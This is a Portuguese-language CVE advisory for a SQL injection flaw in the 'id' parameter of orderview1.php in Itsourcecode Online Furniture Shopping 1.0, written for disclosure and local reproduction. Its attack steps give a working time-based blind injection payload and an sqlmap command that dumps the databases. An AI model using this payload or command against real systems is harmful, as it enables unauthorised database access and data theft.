CVE-2024-50970
Descrição
Uma vulnerabilidade de injeção de SQL em orderview1.php do Itsourcecode Online Furniture Shopping Project 1.0 permite que atacantes remotos executem comandos SQL arbitrários através do parâmetro id.
Tipo de Vulnerabilidade
Injeção de SQL
Fornecedor do Produto
Itsourcecode
Base de Código do Produto Afetado:
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0
Componente Afetado:
O Itsourcecode Online Furniture Shopping v1.0 é vulnerável a injeção de SQL através do parâmetro id na página orderview1.php
Vetores de Ataque:
- Configure a aplicação localmente, registre uma conta e faça login com a conta recém-registrada.
- Navegue até a seguinte URL no seu navegador:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
- Injete o Payload SQL:
Modifique o parâmetro id na URL para incluir um payload de injeção SQL baseado em tempo.
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
- Observe a Resposta da Aplicação:
A página deve demorar visivelmente mais (10 segundos) para carregar se a injeção for bem-sucedida, confirmando que o parâmetro id está vulnerável a injeção de SQL.
- Agora use a ferramenta SQLMap para exploração adicional e extração de bancos de dados usando o comando abaixo:
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
Referência:
- https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
- https://owasp.org/www-community/attacks/SQL_Injection